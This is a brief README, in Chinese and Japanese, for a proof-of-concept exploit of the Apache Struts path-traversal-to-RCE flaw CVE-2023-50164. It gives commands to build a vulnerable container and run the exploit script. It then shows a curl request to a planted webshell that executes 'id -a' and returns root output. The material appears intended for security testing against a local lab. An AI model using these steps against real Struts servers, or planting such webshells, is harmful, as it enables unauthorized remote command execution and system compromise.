
CVE-2023-50164(Apache Struts 路径遍历到 RCE 漏洞)- 概念验证
このPoCは、Apache Struts2の脆弱性を悪用してRCE(リモートコード実行)をテストするために作成されました。

イメージをビルドしてコンテナを実行します:
$ DOCKER_BUILDKIT=1 docker build . -t struts2-rce-poc && docker run --rm -p 8080:8080 struts2-rce-poc
エクスプロイトを実行します:
$ cd exploit
$ ./exploit.sh
これで、サーバー側で任意のコマンドを実行できるようになります:
$ curl http://localhost:8080/webshell/webshell.jsp\?cmd\=id%20-a
uid=0(root) gid=0(root) groups=0(root)